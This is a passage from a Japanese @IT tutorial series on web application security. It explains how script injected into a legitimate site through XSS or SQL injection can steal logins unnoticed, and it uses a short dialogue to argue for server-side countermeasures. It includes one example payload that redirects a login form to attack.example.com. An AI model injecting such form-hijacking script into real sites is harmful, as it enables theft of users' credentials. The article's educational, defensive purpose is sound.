検索
連載

SQLインジェクション攻撃、ターゲットは“あなた”ですもいちどイチから! HTTP基礎訓練中(6)(3/3 ページ)

SQLインジェクション攻撃の波は今も続いています。その被害は情報漏えいだけではなく、多くの被害者を発生させてしまう可能性もあるのです。第6回ではSQLインジェクション攻撃が引き起こす被害について解説します(編集部)

PC用表示 関連情報
Share
Tweet
LINE
Hatena
前のページへ |       

なぜ攻撃者は自分のサーバを使わないのか

 Webアプリケーションに対する受動的攻撃で重要となるのが、「攻撃を行っているサーバがどこにあるか」ということである。よく混同されてしまうのが、脆弱性のあるサーバで攻撃が行われるのと、攻撃者が用意したサーバ上で同じことを行うのとでは、決定的な違いがある。

【注】

例えば、ブラウザクラッシャーのような攻撃者が用意したサーバのみで完結できる受動的攻撃の場合、Webアプリケーションの脆弱性は関係ない場合が多い。


 クロスサイトスクリプティングの場合では、表示されるHTML上にJavaScriptを埋め込むことで、表示を変更したり、認証情報(Cookie情報)などを外部サイトへ送信したりすることができる。

 例えば、図4のようなWebページが存在している場合、改ざんされているか否かが分かるだろうか?

図4 一見何も問題のないように見えるWebページ。証明書にも不審な点はないが……
図4 一見何も問題のないように見えるWebページ。証明書にも不審な点はないが……

 ログイン画面が表示されているだけで、アクセスしているURLも問題なく、証明書もエラーとなっていない。しかし、ブラウザ上の見た目では分からなくとも、仮に、以下のようなJavaScriptが埋め込まれていたとしたら、ログインを行おうとした際に、IDおよびパスワードが外部サイトに送信される仕組みになっているという可能性もある。

<script>document.forms[0].action="https://attack.example.com/"</script>
リスト1 ID、パスワードの送信先をhttps://attack.example.com/にするJavaScriptの例

 ここで1つ考慮すべきは、ユーザーにとっては、「ドメイン名も証明書も問題なく見える」ということである。これが、攻撃者が自ら用意したWebサーバであった場合、ドメイン名も証明書も正規のサイトとはまったく異なるものとなりユーザーが異変にすぐに気付くことができる。

 ユーザーがログインを実行するのを待つような形ではなくとも、すでにユーザーがログイン状態であり、Cookieによって認証情報が管理されているような場合、ユーザーにまったく気付かれることなく攻撃を成功させることも可能である。

 これらの攻撃は、「怪しいリンクをクリックしなければ大丈夫」というものではない。何げなく閲覧しているブログに攻撃コードが埋め込まれている可能性も否定はできない。攻撃されているか否かは、注意深くHTTPメッセージ(リクエスト、レスポンスの双方)を解析していないと通常は分からない形で実行されてしまうこともある。

 「脆弱性があるかもしれない」という前提でWebアプリケーションを利用することを考えなければならないとした場合、ユーザーとしては、ブラウザがサーバとやりとりするHTTPリクエストおよびHTTPレスポンスをヘッダも含めてすべて見る必要が出てきてしまう。そのため、Webアプリケーション側での対策が必須となってくるのである。

                  @IT messenger v2.0(beta)

クウ 意外と奥が深いのですね……。クロスサイトスクリプティングとか基本だし、とか思ってたから深く考えたことなかったです


ジュン あからさまに書き換えている場合は、「改ざんされてる!」って分かるけど、本気で攻撃しようと思ったら、ほとんど気付かれない形でスクリプトとか埋め込めたりするからねぇ。

クウ 今回の事件は、ユーザーに攻撃することが目的だったから、SQLインジェクションを情報漏えいの方向じゃなくて、Webページ改ざんにしたんですねぇ


ジュン 多くのユーザーの目に触れることで、実力を誇示したいとかだと、特に目立つように改ざんしたりするだろうねぇ。 

 そんなわけで、そろそろ寝るー。

クウ いつも教えてもらっちゃって申し訳ないす!

ジュン 人に教えるの好きだからねー。趣味みたいなもんだよー。役に立てたならうれしいしー。 じゃ、おやすみぃ


クウ おやすみなさーい。


クウ、また1つ知識が増えました!

 次の日、受動的攻撃を理解したクウは意気揚々と出社した。

ナツ 「昨日はごめんねぇ。話が中途半端になっちゃって」

クウ 「いえいえー。大丈夫っす!」

ナツ 「受動的攻撃の話する?」

クウ 「ふふふ……。実は昨日家に帰ってから、メッセの知り合いに教えてもらったのです♪」

ナツ 「ほおー。Webアプリのセキュリティに詳しい人が知り合いにいるのだねー。もしかしたら知ってる人だったりして」

クウ 「あは。意外とあり得ますねぇー」

            きょうの格言

    正しい理解が脆弱性をなくす第一歩なのだ!

 

   脆弱性をつくらないためにも脆弱性の危険性について理解しよう。

    攻撃手法、被害を理解すれば、対策の必要性も見えてくる。


【クウたちの壁紙カレンダー、配布中!】

本連載のイラストを担当しているはるぷさんによる、毎月更新のカレンダーが配布されています。ぜひご利用ください!

特製ウォールペーパー

http://www.ubsecure.jp/wallpaper.php


(Illustrated by はるぷ)

Profile

株式会社ユービーセキュア 技術本部 VEXグループ リーダー 兼 セキュリティオーディットコンサルタント

杉山 俊春(すぎやま としはる)

セキュリティコンサルタントとして、主にWebアプリケーションのセキュリティ検査やWebアプリケーション検査ツールの開発などに従事している。大手ショッピングサイトなどの検査実績を持つ。



Copyright © ITmedia, Inc. All Rights Reserved.

前のページへ |       

Security & Trust 記事ランキング

  1. 従業員は「最新のサイバー脅威との戦い」を強いられている セキュリティ教育に不満を持つ理由の1位は?
  2. 「SQLite」のゼロデイ脆弱性、GoogleのAIエージェントが見つける AIは脆弱性調査の課題をどう解決したのか?
  3. 増える標的型ランサムウェア被害、現場支援から見えてきた実態と、脆弱性対応が「限界」の理由
  4. ランサムウェア攻撃を受けた企業、約6割が「サプライチェーンのパートナー経由で影響を受けた」 OpenText調査
  5. Google Cloudがサイバーフィジカルシステムのレジリエンスを高める10の指標を解説 最初にすべきことは?
  6. 日本人の約半数が「1年前より危険」と考えるオンライン詐欺とは マカフィーがホリデーショッピング詐欺に関して調査
  7. 「このままゼロトラストへ進んでいいの?」と迷う企業やこれから入門する企業も必見、ゼロトラストの本質、始め方/進め方が分かる無料の電子書籍
  8. Microsoftが注意喚起 「クイックアシスト」を悪用した「テクニカルサポート詐欺」の手口、対策とは
  9. ゼロトラストの理想と現実を立命館大学 上原教授が語る――本当に運用できるか? 最後は“人”を信用できるかどうか
  10. 長続きする高度セキュリティ人材育成の秘訣を「第19回情報危機管理コンテスト」から探る
ページトップに戻る